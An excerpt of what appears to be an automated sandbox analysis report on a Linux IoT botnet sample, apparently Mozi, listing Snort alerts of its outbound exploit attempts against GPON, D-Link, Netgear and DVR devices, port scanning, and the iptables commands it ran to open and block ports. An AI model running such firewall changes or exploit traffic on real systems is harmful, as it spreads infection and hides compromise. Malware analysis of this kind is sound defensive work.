                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.213.18.103: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 67.131.254.22: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.161.200.6: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.227.175.107: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.196.216.151: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 166.88.241.155: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.62.3.74: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 213.91.166.30: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 208.71.234.42: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.230.19.100: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.146.228.186: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.155.152: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.85.44.74: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.242.180.69: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.233.149.60: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.95.159.167: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40460 -> 112.125.239.197:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40460 -> 112.125.239.197:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 207.174.245.173: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:40704
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 12.125.79.34: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 156.243.30.45: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.98.47.216: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.252.81.170: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 164.82.21.30: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.97.57.196: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.46.148.51: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.21.227.159: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 66.44.57.192: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.86.81.6: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.197.4.212: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.118.110.204: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.126.117: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.96.210.74: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.106.133: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 175.45.105.154: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.244.211.255: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 93.51.232.252: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.179.241.64: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.214.192.245: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.129.90.38: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.193.95.45: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.33.116.90: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.152.110.224: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 64.189.20.4: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 119.225.210.242: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.1.99.120: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.142.94.93: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 96.88.3.156:23 -> 192.168.2.20:53688
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 96.88.3.156:23 -> 192.168.2.20:53688
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.229.102.211: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.149.162.58: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.249.224.17: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.16.47.151: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 207.35.88.172: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.27.78.110: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 27.32.160.214: -> 192.168.2.20:
                Source: TrafficSnort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:41576
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.105.99.147: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.222.33.55: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.207.101.92: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 96.88.3.156:23 -> 192.168.2.20:53962
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 96.88.3.156:23 -> 192.168.2.20:53962
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 49.255.62.198: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 146.148.194.79: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.151.248.115: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.212.50.15: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:52540 -> 210.190.146.92:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 49.44.132.19:80 -> 192.168.2.20:37336
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:37336 -> 49.44.132.19:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.254.52.37: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 71.227.22.112: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.234.240: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.189.49.186: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:50030 -> 104.238.100.85:8080
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59626 -> 77.182.10.124:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59626 -> 77.182.10.124:80
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.179.24.162: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:57790 -> 147.46.176.166:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:57790 -> 147.46.176.166:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.124.230.135:80 -> 192.168.2.20:54640
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:54640 -> 104.124.230.135:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:53902 -> 179.40.62.87:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.45.237.137: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 151.42.41.132: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 41.141.11.172: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 10.77.0.1: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40608 -> 3.22.17.236:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40608 -> 3.22.17.236:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.138.176.236: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.137.124.219: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.252.214.173: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 10.135.53.254: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.89.220.27: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:42472 -> 1.34.1.251:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:42472 -> 1.34.1.251:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.225.53.145: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 5.56.18.66: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 158.96.148.68: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.238.183.86: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.88.217: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.23.35:46153 -> 192.168.2.20:8080
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:45320 -> 45.148.37.237:80
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.247.167.217: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36288 -> 184.86.117.97:80
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.199.65.32: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 195.23.231.85: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57756 -> 164.132.95.120:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57756 -> 164.132.95.120:8080
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 60.240.241.20: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.127.187:8082 -> 192.168.2.20:8080
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 151.63.180.12: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:59000 -> 46.249.83.253:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:59000 -> 46.249.83.253:80
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.91.249: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:58488 -> 185.94.99.39:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:58488 -> 185.94.99.39:8080
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:42192 -> 187.146.119.198:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:42192 -> 187.146.119.198:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.227.19.134: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38376 -> 186.153.124.66:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38376 -> 186.153.124.66:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.236.31.232: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43254 -> 123.110.194.55:80
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 133.67.251.2: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.180.30: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59308 -> 124.71.40.210:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59308 -> 124.71.40.210:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.17.18.122: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33820 -> 13.109.201.46:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33820 -> 13.109.201.46:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:44576 -> 154.210.25.254:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:44576 -> 154.210.25.254:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:54110 -> 114.34.159.229:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:54110 -> 114.34.159.229:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.50.122.98: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50886 -> 154.3.84.96:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49172 -> 59.151.23.11:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49172 -> 59.151.23.11:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.206.33.227: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 185.229.189.17: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:52244 -> 89.129.183.215:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:52244 -> 89.129.183.215:80
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 213.163.117.122:8082 -> 192.168.2.20:8080
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56522 -> 83.151.238.20:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56522 -> 83.151.238.20:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.173.160.123: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60358 -> 166.88.13.234:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.75.23.254: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36846 -> 188.106.17.156:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36846 -> 188.106.17.156:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 134.106.144.216: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.109.232.198: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49468 -> 104.94.83.241:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49468 -> 104.94.83.241:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:47256 -> 204.232.228.51:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.94.83.241:80 -> 192.168.2.20:49468
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36234 -> 104.24.17.66:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36234 -> 104.24.17.66:8080
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:52176 -> 194.76.32.64:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:52176 -> 194.76.32.64:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56082 -> 154.92.39.203:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56082 -> 154.92.39.203:80
                Source: TrafficSnort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:41890 -> 118.48.130.177:8080
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33196 -> 185.36.171.129:80
                Connects to many ports of the same IP (likely port scanning)Show sources
                Source: global trafficTCP traffic: 19.35.22.33 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 69.153.253.195 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 215.110.247.154 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 7.133.161.69 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 48.57.169.235 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 57.50.30.157 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 69.107.161.237 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 84.183.159.213 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 54.39.218.76 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 37.127.116.2 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 27.46.25.163 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 183.30.162.72 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 12.121.21.175 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 151.160.250.99 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 72.240.24.193 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 112.36.7.254 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 200.160.26.61 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 49.240.54.114 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 8.191.54.125 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 54.72.49.99 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 102.247.160.88 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 91.192.83.22 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 3.31.11.51 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 21.71.60.36 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 188.61.141.250 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 141.215.180.231 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 137.225.108.177 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 146.5.176.64 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 160.189.168.11 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 89.192.178.91 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 91.193.93.252 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 220.112.131.158 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 146.31.191.38 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 175.79.49.111 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 189.16.44.51 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 184.225.49.232 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 137.142.227.113 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 211.130.169.58 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 108.58.115.194 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 85.4.13.35 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 45.71.81.134 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 215.122.80.92 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 116.26.35.18 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 15.81.245.80 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 72.204.193.69 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 33.33.197.233 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 11.0.46.244 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 81.185.164.190 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 47.167.153.49 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 222.36.210.127 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 198.26.185.1 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 5.144.31.210 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 97.149.39.21 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 66.156.43.17 ports 2,5,6,8,9,52869
                Source: global trafficTCP traffic: 46.138.124.14 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 119.17.3.130 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 54.194.243.156 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 62.237.39.27 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 35.197.143.134 ports 1,2,4,5,9,49152
                Source: global trafficTCP traffic: 117.0.115.227 ports 2,5,6,8,9,52869
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4638)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4672)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4679)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4720)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT
                Source: /bin/sh (PID: 4732)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4755)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4763)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4785)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT
                Source: /bin/sh (PID: 4815)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4819)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4838)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4866)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4896)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4915)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4939)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4966)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
